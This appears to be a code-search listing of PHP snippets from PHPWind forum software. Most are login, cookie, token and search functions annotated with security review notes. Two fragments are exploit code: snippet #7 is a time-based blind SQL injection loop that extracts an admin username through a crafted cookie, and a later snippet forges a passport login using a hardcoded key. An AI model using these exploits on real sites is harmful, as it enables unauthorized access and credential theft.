コード例 #1
ファイル: class_User.php プロジェクト: adi00/wumaproject
 /**
  * Sync-login handler: plants the forum login cookies for the user described by $user.
  *
  * @param string $user Encoded credential string. After $this->base->strcode()
  *                     (presumably a decode when called with false - confirm)
  *                     it is split on tabs into uid, username and password.
  * @return string Always ''.
  */
 function synlogin($user)
 {
     global $timestamp, $uc_key;

     $decoded = $this->base->strcode($user, false);
     // The username (second field) is not needed below.
     list($uid, , $pwd) = explode("\t", $decoded);

     // Compact P3P policy header, emitted before the cookies are set.
     header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');

     // Cookies expire one year (31536000 s) after $timestamp.
     $expires = 31536000 + $timestamp;

     // NOTE(review): both cookies carry a value derived from the password
     // (PwdCode($pwd), md5($uc_key . $pwd)) and stay valid for a year, so they
     // are password-equivalent for as long as the password is unchanged.
     // Whether Cookie() sets HttpOnly/Secure is not visible here - confirm.
     // The safecv field is written empty, hence the trailing tab.
     Cookie("winduser", StrCode($uid . "\t" . PwdCode($pwd) . "\t"), $expires);
     Cookie("ucuser", StrCode($uid . "\t" . md5($uc_key . $pwd)), $expires);
     Cookie('lastvisit', '', 0);

     return '';
 }
コード例 #2
ファイル: pwbbs5.php プロジェクト: GHubgenius/qbbj
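/**
 * Fetch the current user's data from the "winduser" login cookie.
 *
 * The cookie is decoded with StrCode() and split on tabs into uid, password
 * token and safecv; the token is then checked against the stored password.
 *
 * @return mixed '' when the cookie carries no uid or no password token; null
 *               when the token (or, with $db_ifsafecv enabled, the safecv
 *               value) does not match the stored record; otherwise whatever
 *               $userDB->get_allInfo() returned for the uid.
 */
function PassportUserdb()
{
    global $db, $timestamp, $webdb, $onlineip, $TB, $pre, $db_ifsafecv, $userDB;

    // Pad to three fields so a short or empty cookie yields empty strings
    // instead of undefined offsets.
    $fields = explode("\t", StrCode(GetCookie('winduser'), 'DECODE'));
    list($lfjuid, $lfjpwd, $safecv) = array_pad($fields, 3, '');
    if (!$lfjuid || !$lfjpwd) {
        return '';
    }

    $detail = $userDB->get_allInfo($lfjuid);

    // The key must be the quoted string 'password'; a bare word is an
    // undefined constant. Compare as strings with ===: the cookie value is
    // client-supplied, and a loose comparison treats two different
    // numeric-looking digests ("0e...") as equal.
    // NOTE(review): where the runtime provides hash_equals(), prefer it for a
    // constant-time comparison.
    if ((string) PwdCode($detail['password']) !== (string) $lfjpwd) {
        return;
    }
    if ($db_ifsafecv && (string) $safecv !== (string) $detail['safecv']) {
        return;
    }
    return $detail;
}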
コード例 #3
ファイル: class_User.php プロジェクト: jechiy/PHPWind
 /**
  * Sync-login handler: sets the forum login cookies for the user described by
  * $user and then records a "continue_login" medal event.
  *
  * $user is passed through $this->base->strcode() (presumably a decode when
  * called with false - confirm) and split on tabs into uid, username, password.
  * Always returns ''.
  */
 function synlogin($user)
 {
     global $timestamp, $uc_key;
     list($winduid, $windid, $windpwd) = explode("\t", $this->base->strcode($user, false));
     // Compact P3P policy header, emitted before the cookies are set.
     header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
     $safecv = '';
     // One year in seconds, turned into an absolute expiry time.
     $cktime = 31536000;
     $cktime != 0 && ($cktime += $timestamp);
     // NOTE(review): both cookies carry a value derived from the password and
     // stay valid for a year, so they are password-equivalent for as long as
     // the password is unchanged. Whether Cookie() sets HttpOnly/Secure is not
     // visible here - confirm.
     Cookie("winduser", StrCode($winduid . "\t" . PwdCode($windpwd) . "\t" . $safecv), $cktime);
     Cookie("ucuser", StrCode($winduid . "\t" . md5($uc_key . $windpwd)), $cktime);
     Cookie('lastvisit', '', 0);
     // medal award - start (original comment was mis-encoded in this listing)
     // The include runs in this function's scope, so it can see the locals above.
     require_once R_P . 'require/functions.php';
     doMedalBehavior($winduid, 'continue_login');
     // medal award - end
     return '';
 }
コード例 #4
ファイル: wap_mod.php プロジェクト: adi00/wumaproject
/**
 * WAP login: checks the supplied password against pw_members, keeps a
 * failed-attempt record in pw_memberdata.onlineip and, on success, sets the
 * login cookies.
 *
 * $lgt selects the lookup column (non-zero: uid, zero: username).
 * $password is compared directly with the stored hash, so it presumably
 * arrives already hashed - confirm against callers.
 *
 * NOTE(review): two string values in this listing are masked with asterisks
 * (the password UPDATE and $F_login); the statements are reproduced as shown
 * and cannot be reviewed from here.
 */
function wap_login($username, $password, $safecv, $lgt = 0)
{
    global $db, $timestamp, $onlineip, $db_ckpath, $db_ckdomain, $db_bbsurl, $db_ifsafecv;
    // The column name comes from two fixed literals; only the value is
    // request-derived and it goes through pwEscape().
    $men = $db->get_one("SELECT m.uid,m.password,m.safecv,m.groupid,m.yz,md.onlineip FROM pw_members m LEFT JOIN pw_memberdata md ON md.uid=m.uid WHERE m." . ($lgt ? 'uid' : 'username') . "=" . pwEscape($username));
    if ($men) {
        // onlineip is split on "|" into: IP marker, time of last failure,
        // remaining attempts.
        $e_login = explode("|", $men['onlineip']);
        // An attempt is allowed when the last failure came from another IP,
        // is more than 600 seconds old, or more than one attempt remains.
        // NOTE(review): the counter is keyed on the client IP, so it does not
        // limit guessing spread across addresses.
        if ($e_login[0] != $onlineip . ' *' || $timestamp - $e_login[1] > 600 || $e_login[2] > 1) {
            $men_uid = $men['uid'];
            $men_pwd = $men['password'];
            $check_pwd = $password;
            if ($men['yz'] > 2) {
                wap_msg('login_jihuo');
            }
            if (strlen($men_pwd) == 16) {
                $check_pwd = substr($password, 8, 16);
                /* support legacy passwords stored as a 16-character md5 slice */
            }
            // NOTE(review): loose == on hash strings; two different
            // numeric-looking digests ("0e...") compare equal. A strict
            // string comparison avoids that.
            if ($men_pwd == $check_pwd && (!$db_ifsafecv || $men['safecv'] == $safecv)) {
                if (strlen($men_pwd) == 16) {
                    // Value masked in this listing.
                    $db->update("UPDATE pw_members SET password="******" WHERE uid=" . pwEscape($men_uid));
                }
                $L_groupid = (int) $men['groupid'];
                Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
            } else {
                global $L_T;
                // Decrement the remaining-attempt counter; start at 5 when unset.
                $L_T = $e_login[2];
                $L_T ? $L_T-- : ($L_T = 5);
                // Value masked in this listing.
                $F_login = "******";
                $db->update("UPDATE pw_memberdata SET onlineip=" . pwEscape($F_login) . " WHERE uid=" . pwEscape($men_uid));
                wap_msg('login_pwd_error');
            }
        } else {
            global $L_T;
            // Seconds left until the 600-second lockout ends.
            $L_T = 600 - ($timestamp - $e_login[1]);
            wap_msg('login_forbid');
        }
    } else {
        global $errorname;
        $errorname = $username;
        // NOTE(review): a distinct "user does not exist" message lets a client
        // tell valid account names from invalid ones.
        wap_msg('user_not_exists');
    }
    // NOTE(review): this point is meant to be reached only after a successful
    // check, which holds only if wap_msg() ends the request on every failure
    // path above - confirm.
    Cookie("winduser", StrCode($men_uid . "\t" . PwdCode($password) . "\t" . $safecv));
    Cookie('lastvisit', '', 0);
    wap_msg('wap_login', 'index.php');
}
コード例 #5
ファイル: phpwind.php プロジェクト: shenhua4286/gxw
/**
 * Look a member up by name and password and, when found, issue the forum
 * login cookies plus the "onez_" bridge cookies.
 *
 * NOTE(review): the WHERE condition below is masked with asterisks in this
 * listing. If the real file interpolates $user and the password hash there,
 * both must be escaped or bound as parameters - confirm against the source.
 * NOTE(review): the password is hashed with a single unsalted md5().
 *
 * @param string $user Member name.
 * @param string $pass Plain-text password.
 * @return mixed false when no member matches, 'Y' once the cookies are set.
 */
function API_Login($user, $pass)
{
    global $Block, $setting, $onlineip, $_COOKIE, $_SERVER;

    $passHash = md5($pass);
    $rows = Conn()->record("members", "uid,username,password,safecv", "username='******' and password='******'");
    if (!$rows) {
        return false;
    }
    $member = $rows[0];
    $uid = $member['uid'];

    // Login token: md5 over User-Agent, password hash and the site's db_hash.
    $token = md5($_SERVER['HTTP_USER_AGENT'] . $passHash . $GLOBALS['db_hash']);
    $encoded = StrCode(stripSlashes($uid . "\t" . $token . "\t" . $member['safecv']), "ENCODE");

    // The cookie prefix is switched through $GLOBALS['cookiepre'], which
    // osetcookie() presumably reads - the order of these calls matters.
    $GLOBALS['cookiepre'] = substr(md5($GLOBALS['db_sitehash']), 0, 5) . '_';
    osetcookie('winduser', $encoded, 31536000);
    osetcookie('ck_info', $GLOBALS['db_ckpath'] . "\t" . $GLOBALS['db_ckdomain'], 31536000);
    osetcookie('lastvisit', '', 0);

    // NOTE(review): 'userid' and 'username' go out as plain values; code that
    // reads them back must not treat them as proof of identity.
    $GLOBALS['cookiepre'] = 'onez_';
    osetcookie('userid', $uid, 31536000);
    osetcookie('username', $member['username'], 31536000);

    return 'Y';
}
コード例 #6
ファイル: postactivity.class.php プロジェクト: jechiy/PHPWind
 /**
  * Run an activity-field search and return the matching thread ids.
  *
  * $field is an encoded, serialized array of search values keyed like the
  * field definitions from PW_PostActivity::getFieldData(). Each non-empty
  * value adds one condition to a WHERE clause; the clause is then used for a
  * count query, a paged tid query and, when $alltidtype is set, an unpaged
  * tid query.
  *
  * Returns array($count, $tiddb, $alltiddb). $count is -1 when nothing
  * matched. $tiddb and $alltiddb are only assigned inside the fetch loops, so
  * they are unset when no row was fetched.
  */
 function getSearchvalue($field, $type, $alltidtype = false, $backtype = false)
 {
     /* fetch search results */
     global $db_perpage, $page, $actmid, $fid, $basename;
     // NOTE(review): unserialize() on a value that may come from the request
     // (callers shown on this page pass a request parameter) allows PHP object
     // injection if the StrCode() encoding can be reproduced by a client.
     // Safer: a format without object support (JSON), or unserialize() with
     // allowed_classes disabled where the runtime supports it, plus an
     // is_array() check before the loop.
     $field = unserialize(StrCode($field, 'DECODE'));
     $sqladd = '';
     $defaultValueTableName = getActivityValueTableNameByActmid();
     $fid && ($sqladd .= " {$defaultValueTableName}.fid=" . S::sqlEscape($fid));
     $fielddb = PW_PostActivity::getFieldData($actmid, $type);
     if ($actmid) {
         $userDefinedTableName = getActivityValueTableNameByActmid($actmid, 1, 1);
     } else {
         $userDefinedTableName = '';
     }
     // Column names come from $fielddb (field definitions) and are concatenated
     // unescaped; only the values go through S::sqlEscape(). Keys missing from
     // $fielddb are skipped by the "continue" below.
     foreach ($field as $key => $value) {
         if ($value) {
             if ($fielddb[$key]['ifdel']) {
                 $tableName = $userDefinedTableName . '.';
             } elseif ($fielddb[$key]) {
                 $tableName = $defaultValueTableName ? $defaultValueTableName . '.' : '';
             } else {
                 continue;
             }
             if (in_array($fielddb[$key]['type'], array('number', 'radio', 'select'))) {
                 // Exact match.
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value) : $tableName . $fielddb[$key]['fieldname'] . "=" . S::sqlEscape($value);
             } elseif ($fielddb[$key]['type'] == 'checkbox') {
                 // Join the ticked values with commas and match them as one
                 // ",a,b," substring; the joined string is escaped as a whole.
                 $checkboxs = '';
                 foreach ($value as $cv) {
                     $checkboxs .= $checkboxs ? ',' . $cv : $cv;
                 }
                 $value = '%,' . $checkboxs . ',%';
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'calendar') {
                 $value && ($value = PwStrtoTime($value));
                 if (strpos($fielddb[$key]['fieldname'], 'start') !== false) {
                     $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value);
                 } elseif (strpos($fielddb[$key]['fieldname'], 'end') !== false) {
                     // Derive the matching start column by replacing the last
                     // seven characters of the field name with 'starttime'.
                     $starttimeFlag = substr($fielddb[$key]['fieldname'], 0, -7) . 'starttime';
                     if ($value <= PwStrtoTime($field[$starttimeFlag]) && $field[$starttimeFlag]) {
                         Showmsg('calendar_error');
                     }
                     $sqladd .= $sqladd ? " AND " . $tableName . $starttimeFlag . "<=" . S::sqlEscape($value) : $tableName . $starttimeFlag . "<=" . S::sqlEscape($value);
                 } else {
                     $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['start']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['end']);
                 }
             } elseif (in_array($fielddb[$key]['type'], array('text', 'url', 'email', 'textarea'))) {
                 // Substring match. NOTE(review): % and _ inside the value stay
                 // active as LIKE wildcards unless S::sqlEscape() handles them.
                 $value = '%' . $value . '%';
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")" : $tableName . $fielddb[$key]['fieldname'] . " LIKE(" . S::sqlEscape($value) . ")";
             } elseif ($fielddb[$key]['type'] == 'range' && $value['min'] && $value['max']) {
                 $sqladd .= $sqladd ? " AND " . $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']) : $tableName . $fielddb[$key]['fieldname'] . ">=" . S::sqlEscape($value['min']) . " AND " . $tableName . $fielddb[$key]['fieldname'] . "<=" . S::sqlEscape($value['max']);
             } else {
                 $sqladd .= '';
             }
         }
     }
     if ($sqladd) {
         !$page && ($page = 1);
         $start = ($page - 1) * $db_perpage;
         $limit = S::sqlLimit($start, $db_perpage);
         $actmidSql = $actmid ? "AND actmid=" . S::sqlEscape($actmid) : '';
         // $sqladd is non-empty in this branch, so the first arm is always taken.
         $sqladd .= $sqladd ? " AND {$defaultValueTableName}.ifrecycle=0 " . $actmidSql : " {$defaultValueTableName}.ifrecycle=0 " . $actmidSql;
         $count = $this->db->get_value("SELECT COUNT(*) as count FROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " WHERE {$sqladd}");
         $query = $this->db->query("SELECT tid \n\t\t\t\t\t\t\t\t\tFROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " \n\t\t\t\t\t\t\t\t\tWHERE {$sqladd} {$limit}");
         while ($rt = $this->db->fetch_array($query)) {
             $tiddb[] = $rt['tid'];
         }
         if ($alltidtype) {
             // Same condition without the LIMIT: every matching tid.
             $query = $this->db->query("SELECT tid FROM {$defaultValueTableName} " . ($userDefinedTableName ? "LEFT JOIN {$userDefinedTableName} USING (tid)" : "") . " WHERE {$sqladd}");
             while ($rt = $this->db->fetch_array($query)) {
                 $alltiddb[] = $rt['tid'];
             }
         }
         !$count && ($count = -1);
     } else {
         // No usable condition: report "nothing to search" (presumably both
         // message helpers end the request - confirm).
         if ($backtype) {
             adminmsg('topic_search_none', "{$basename}&action=topic&actmid={$actmid}");
         }
         Showmsg('topic_search_none');
     }
     return array($count, $tiddb, $alltiddb);
 }
コード例 #7
ファイル: 2759.php プロジェクト: noscripter/exploit-database
        if ($i == 255) {
            die("\nExploit failed...");
        }
    }
    $j++;
}
$j = 1;
$admin = "";
while (!strstr($admin, chr(0))) {
    for ($i = 0; $i <= 255; $i++) {
        $sql = "9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username," . $j . ",1))=" . $i . "),benchmark(" . $b . ",char(0)),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";
        echo "sql -> " . $sql . "\n";
        $packet = "GET " . $p . "admin.php HTTP/1.0\r\n";
        $packet .= "CLIENT-IP: 1.2.3.4\r\n";
        $packet .= "Host: " . $host . "\r\n";
        $packet .= "Cookie: " . $cp . "AdminUser="******"9999999999\t" . $sql, "ENCODE") . ";\r\n";
        $packet .= "Accept: text/plain\r\n";
        $packet .= "Connection: Close\r\n\r\n";
        $packet .= $data;
        sendpacketii($packet);
        usleep(2000000);
        $starttime = time();
        echo "starttime -> " . $starttime . "\r\n";
        sendpacketii($packet);
        $endtime = time();
        echo "endtime -> " . $endtime . "\r\n";
        $difftime = $endtime - $starttime;
        echo "difftime -> " . $difftime . "\r\n";
        if ($difftime > $timeout) {
            $admin .= chr($i);
            echo "admin -> " . $admin . "[???]\r\n";
コード例 #8
ファイル: ck.php プロジェクト: adi00/wumaproject
 /**
  * Store the verification-code cookie ("cknum").
  *
  * The payload is "$timestamp", two tabs, then md5($code . $timestamp),
  * encoded with StrCode().
  *
  * NOTE(review): the digest mixes in no server-side secret, so the secrecy of
  * $code rests entirely on StrCode() being irreversible for the client.
  *
  * @param string $code Verification code to bind to the cookie.
  */
 function cookie($code)
 {
     global $timestamp;

     $digest = md5($code . $timestamp);
     $payload = $timestamp . "\t\t" . $digest;
     Cookie('cknum', StrCode($payload));
 }
コード例 #9
ファイル: postcate.php プロジェクト: adi00/wumaproject
     $searchhtml .= '</span>';
     $asearchhtml .= '</span>';
     if (strpos($searchhtml, '</span></span>') !== false) {
         $searchhtml = str_replace('</span></span>', '</span>', $searchhtml);
     }
     if (strpos($asearchhtml, '</span></span>') !== false) {
         $asearchhtml = str_replace('</span></span>', '</span>', $asearchhtml);
     }
     $pcid = (int) $pcid;
     $pcvaluetable = GetPcatetable($pcid);
 }
 if ($step == 'search') {
     require_once R_P . 'lib/postcate.class.php';
     $searchPostcate = new postCate($field);
     if (!$newfield) {
         $newfield = StrCode(serialize($field));
     }
     list($count, $tiddb, $alltiddb) = $searchPostcate->getSearchvalue($newfield, 'one', true, true);
     is_array($tiddb) && ($sql .= " AND pv.tid IN(" . pwImplode($tiddb) . ")");
     is_array($alltiddb) && ($alltids = implode(',', $alltiddb));
 }
 if ($step != 'search' || !$count) {
     $alltiddb = $threadb = $newtiddb = array();
     $alltiddb = array();
     $query = $db->query("SELECT tid FROM {$pcvaluetable} WHERE ifrecycle=0");
     while ($rt = $db->fetch_array($query)) {
         $alltiddb[] = $rt['tid'];
     }
     if ($alltiddb) {
         $query = $db->query("SELECT tid FROM pw_threads WHERE tid IN(" . pwImplode($alltiddb) . ")");
         while ($rt = $db->fetch_array($query)) {
コード例 #10
ファイル: area_thread.php プロジェクト: jechiy/PHPWind
             $db->free_result($query);
         }
         unset($toptids, $L, $limit, $toppeddb);
     } else {
         list($st, $lt, $asc, $R) = getstart($start_limit - $rows, $asc, $count);
         $limit2 = S::sqlLimit($st, $lt);
     }
     unset($rows);
 } else {
     list($st, $lt, $asc, $R) = getstart($start_limit, $asc, $count);
     $limit2 = S::sqlLimit($st, $lt);
 }
 if ($limit2) {
     if ($topicsearch == 1) {
         S::gp(array('searchname', 'new_searchname'));
         $searchname && ($new_searchname = StrCode(serialize($searchname)));
         if ($modelid > 0) {
             list($count, $tiddb, $alltiddb) = $postTopic->getSearchvalue($new_searchname, 'one', true);
         } elseif ($pcid > 0) {
             list($count, $tiddb, $alltiddb) = $postCate->getSearchvalue($new_searchname, 'one', true);
         }
         if ($tiddb) {
             $query = $db->query("SELECT * FROM pw_threads WHERE tid IN (" . S::sqlImplode($tiddb) . ")");
             $urladd = "&topicsearch=1&new_searchname={$new_searchname}";
             while ($thread = $db->fetch_array($query)) {
                 $tpcdb[] = $thread;
             }
             $db->free_result($query);
         }
     } else {
         $topadd && ($topadd .= $R ? ' ASC,' : ' DESC,');
コード例 #11
ファイル: wap_mod.php プロジェクト: jechiy/PHPWind
/**
 * Decode and validate a member's one-off login token.
 *
 * The decoded token has four tab-separated fields: expiry time, permitted
 * use count, code and a digest. The digest must equal characters 8..25 of
 * md5($expire . $code . $times).
 *
 * NOTE(review): the digest covers only fields carried in the token itself and
 * no server-side secret, so the token's integrity rests on StrCode() alone.
 *
 * @param string $token    Encoded login token.
 * @param int    $curtimes Number of times the token has been used so far.
 * @return string The code, passed through addslashes(), when the token is
 *                valid; '' otherwise (never FALSE).
 */
function deWindToken($token, $curtimes = 60)
{
    $plain = StrCode($token, 'DECODE');
    list($expire, $times, $code, $md5word) = explode("\t", $plain);

    // Digest first, then use count, expiry, and finally a non-empty code.
    if (!(substr(md5($expire . $code . $times), 8, 18) === $md5word)) {
        return '';
    }
    if (!($times >= $curtimes)) {
        return '';
    }
    if (!($expire >= time())) {
        return '';
    }
    if (!$code) {
        return '';
    }
    return addslashes($code);
}
コード例 #12
ファイル: funuser_phpwind7.php プロジェクト: thu0ng91/jmc
/**
 * User interface hook: logout handling.
 *
 * Builds a signed "quit" request from the session's user data and redirects
 * the browser to the PHPWind passport client.
 *
 * NOTE(review): $_REQUEST['forward'] is copied into the redirect chain without
 * validation. Unless the passport side restricts it, this is an open-redirect
 * vector; an allow-list of local paths or known hosts would close it.
 *
 * @param      array       $params Parameter array, by reference. 'jumpurl' is
 *                                 replaced by $_REQUEST['forward'] when that is
 *                                 non-empty, and is read when signing and
 *                                 building the redirect.
 * @access     public
 * @return     bool        Always true.
 */
function jieqi_ulogout_iprocess(&$params)
{
    // Basic user info taken from the session. The password is sent empty; the
    // reputation/currency fields of the original interface are not sent.
    $userdb = array(
        'uid' => $_SESSION['jieqiUserId'],
        'username' => $_SESSION['jieqiUserUname'],
        'password' => '',
        'email' => $_SESSION['jieqiUserEmail'],
        'time' => time(),
        'cktime' => 'F',
    );

    if (!empty($_REQUEST['forward'])) {
        $params['jumpurl'] = $_REQUEST['forward'];
    }

    // Serialize as key=value pairs joined with "&" (values are not URL-encoded).
    $pairs = array();
    foreach ($userdb as $key => $val) {
        $pairs[] = "{$key}={$val}";
    }

    // Encode, then drop every "=" from the encoded string.
    $userdb_encode = str_replace('=', '', StrCode(implode('&', $pairs)));

    // Signature over action, payload, forward URL and the shared passport key.
    $verify = md5('quit' . $userdb_encode . $params['jumpurl'] . PHPWIND_PASSPORT_KEY);

    $target = PHPWIND_PASSPORT_URL . '/passport_client.php?action=quit&userdb=' . rawurlencode($userdb_encode) . '&forward=' . rawurlencode($params['jumpurl']) . '&verify=' . rawurlencode($verify);
    header('Location: ' . $target);
    return true;
}
コード例 #13
 /**
  * Store the verification-code cookie ("cknum").
  *
  * The payload is "$timestamp", two tabs, then
  * md5($code . $timestamp . getHashSegment()), encoded with StrCode().
  * getHashSegment() presumably supplies a server-side value, so the digest
  * cannot be recomputed from the cookie contents alone - confirm.
  *
  * @param string $code Verification code to bind to the cookie.
  */
 function cookie($code)
 {
     global $timestamp;

     $digest = md5($code . $timestamp . getHashSegment());
     $payload = $timestamp . "\t\t" . $digest;
     Cookie('cknum', StrCode($payload));
 }
コード例 #14
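// Passport client callback: verifies the signed request, performs the
// requested login/logout, then redirects the browser to $forward.
// $action and $userdb are set before this excerpt (not visible here).
$forward = isset($_POST['forward']) ? $_POST['forward'] : (isset($_GET['forward']) ? $_GET['forward'] : '');
$verify = isset($_POST['verify']) ? $_POST['verify'] : (isset($_GET['verify']) ? $_GET['verify'] : '');
// Array-valued parameters (forward[]=...) are never valid here; treat them as
// empty rather than passing an array into the string functions below.
is_string($forward) || ($forward = '');
is_string($verify) || ($verify = '');
$forward = str_replace('&#61;', '=', $forward);
$config['phpwind'] = jconf::get('phpwind');
$key = $config['phpwind']['pw_pptkey'];
// Compare the signature as strings with ===. $verify is request-supplied, and
// a loose == treats two different numeric-looking digests ("0e...") as equal.
// NOTE(review): where the runtime provides hash_equals(), prefer it for a
// constant-time comparison. An empty $key makes the signature computable by
// anyone; reject that configuration at install time.
$expected = md5($action . $userdb . urldecode($forward) . $key);
if ($verify === $expected) {
    $config = jconf::get();
    $db_charset = strtolower(str_replace('-', '', $config['charset']));
    if (!defined('JSG_DB_CHARSET')) {
        define("JSG_DB_CHARSET", $db_charset);
    }
    $db_prefix = $config['db_table_prefix'];
    if (!defined('JSG_DB_PRE')) {
        define("JSG_DB_PRE", $db_prefix);
    }
    // Replaces $userdb with the array parsed from the decoded payload.
    parse_str(StrCode($userdb, $key, 'DECODE'), $userdb);
    if ($action == 'login') {
        $userdb = escapeChar($userdb);
        if (is_array($userdb) && $userdb['username'] && $userdb['password']) {
            synlogin($userdb['username'], $userdb['password']);
        }
    }
    if ($action == 'quit') {
        synlogout();
    }
}
// NOTE(review): this redirect runs whether or not the signature matched, and
// $forward comes from the request, so the endpoint is an unauthenticated open
// redirect. Redirect only after a successful check, or restrict $forward to an
// allow-list of local paths / known hosts.
header('Location: ' . $forward);
exit;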
function escapeChar($mixed, $isint = false, $istrim = false)
{
    if (is_array($mixed)) {
コード例 #15
ファイル: weibologin.php プロジェクト: sherlockhouse/aliyun
/**
 * Log a user in by id: load the user record if none was supplied, run it
 * through checkpass(), then set the login cookies.
 *
 * $cktime is the cookie lifetime in seconds (0 leaves the expiry at 0);
 * $lgt is passed through to checkpass(). Returns the array produced by
 * checkpass(). When checkpass() returns a non-array it is handed to Showmsg(),
 * which presumably ends the request - confirm.
 *
 * NOTE(review): the stored password value from the user record is fed to
 * checkpass(), so this path performs no check of a user-supplied secret;
 * callers must have authenticated $userId by other means before calling.
 */
function processLogin($userId, $user = null, $cktime = '31536000', $lgt = 0)
{
    global $timestamp, $db_ckpath, $db_ckdomain, $db_autoban;
    if (!$user) {
        $userService = L::loadClass('UserService', 'user');
        /* @var $userService PW_UserService */
        $user = $userService->get($userId, true, true);
    }
    $pwuser = $user['username'];
    $md5_pwpwd = $user['password'];
    $safecv = $user['safecv'];
    // Included in function scope: the file can see the locals defined above.
    require_once R_P . 'require/checkpass.php';
    $logininfo = checkpass($pwuser, $md5_pwpwd, $safecv, $lgt);
    if (!is_array($logininfo)) {
        Showmsg($logininfo);
    }
    // Only the first and third elements (uid and cookie password token) are used.
    list($winduid, , $windpwd, ) = $logininfo;
    /*update cache*/
    $_cache = getDatastore();
    $_cache->delete("UID_" . $winduid);
    // Turn the relative lifetime into an absolute expiry time.
    $cktime != 0 && ($cktime += $timestamp);
    Cookie("winduser", StrCode($winduid . "\t" . $windpwd . "\t" . $safecv), $cktime);
    Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
    Cookie('lastvisit', '', 0);
    // Clear lastvisit so a newly registered member is counted among today's visitors.
    // automatic medal award - start
    require_once R_P . 'require/functions.php';
    doMedalBehavior($winduid, 'continue_login');
    // automatic medal award - end
    if ($db_autoban) {
        require_once R_P . 'require/autoban.php';
        autoban($winduid);
    }
    return $logininfo;
}
コード例 #16
 /**
  * Validate the answer to a verification question.
  *
  * A positive $question indexes the configured answers in $db_answer; a
  * negative one is checked against the 'ckquestion' cookie via SafeCheck()
  * with a 1800-second window.
  *
  * @param $answer   Answer supplied by the user
  * @param $question Question identifier
  * @return int 1 when the check fails (including a missing question), 0 when it passes
  */
 function checkQanswer($answer, $question)
 {
     global $db_answer;

     // No question selected counts as a failure.
     if (!$question) {
         return 1;
     }
     // Configured question: compare with the stored answer (loose comparison).
     if ($question > 0 && $answer != $db_answer[$question]) {
         return 1;
     }
     // Generated question: the expected answer is bound to the cookie.
     if ($question < 0) {
         $stored = explode("\t", StrCode(GetCookie('ckquestion'), 'DECODE'));
         if (!SafeCheck($stored, $answer, 'ckquestion', 1800, false, false)) {
             return 1;
         }
     }
     return 0;
 }
//[fix]:http://www.phpwind.net/read-htm-tid-392683.html
//CODE IN require\defend.php[line 8-15]
//foreach($_GET as $_key=>$_value){
// !ereg("^\_",$_key) && !isset($$_key) && $$_key=$_GET[$_key];
//}
//$passport_ifopen = $passport_type = $passport_key = ''; //<--------here!!!!
//require_once(D_P.'data/bbscache/config.php');
//if($db_forcecharset && !defined('W_P')){
// @header("Content-Type: text/html; charset=$db_charset");
//}
////////////////////////////////////////////////////
$passwod = '123456789';
$passport_key = '6f0xuRI8Cd8iga';
$forward = " http://localhost/PHPWind5.0.1/upload/index.php";
$userdb = "time=99999999999999999&username=heige111&password="******"passport_client.php?passport_type=client&passport_ifopen=1&action=login&forward=" . urlencode($forward) . "&passport_key=" . $passport_key . "&verify=" . $verify . "&userdb=" . urlencode($userdb);
function StrCode($string, $action = 'ENCODE')
{
    $GLOBALS['db_hash'] = '6f0xuRI8Cd8iga';
    $key = substr(md5($_SERVER["HTTP_USER_AGENT"] . $GLOBALS['db_hash']), 8, 18);
    //$key = '6f0xuRI8Cd8iga'; [当时误把$key当作了$passport_key]
    $string = $action == 'ENCODE' ? $string : base64_decode($string);
    $len = strlen($key);
    $code = '';
    for ($i = 0; $i < strlen($string); $i++) {
        $k = $i % $len;
        $code .= $string[$i] ^ $key[$k];
    }
    $code = $action == 'DECODE' ? $code : base64_encode($code);
コード例 #18
ファイル: info_safe.php プロジェクト: jechiy/PHPWind
        }
        //update meminfo
        if ($upmeminfo) {
            updateThreadTrade($upmeminfo, $winduid);
        }
        unset($upmemdata, $upmeminfo);
        $result = $userService->update($winduid, $pwSQL);
        // defend start
        CloudWind::yunUserDefend('editprofile', $winduid, $windid, $upmemdata['pwdctime'], 0, 101, '', '', '', array('profile' => array_keys($pwSQL)));
        // defend end
        /* platform weibo app */
        $siteBindService = L::loadClass('WeiboSiteBindService', 'sns/weibotoplatform/service');
        /* @var $siteBindService PW_WeiboSiteBindService */
        if ($siteBindService->isOpen() && $upmembers['password']) {
            $weiboLoginService = L::loadClass('WeiboLoginService', 'sns/weibotoplatform/service');
            /* @var $weiboLoginService PW_WeiboLoginService */
            $weiboLoginService->setLoginUserPasswordHasReset($winduid);
            Cookie("winduser", StrCode($winduid . "\t" . PwdCode($upmembers['password']) . "\t" . $upmembers['safecv']));
            Cookie("ck_info", $db_ckpath . "\t" . $db_ckdomain);
            Cookie('lastvisit', '', 0);
            //自动获取勋章_start
            require_once R_P . 'require/functions.php';
            doMedalBehavior($winduid, 'continue_login');
            //自动获取勋章_end
        }
        //* $_cache = getDatastore();
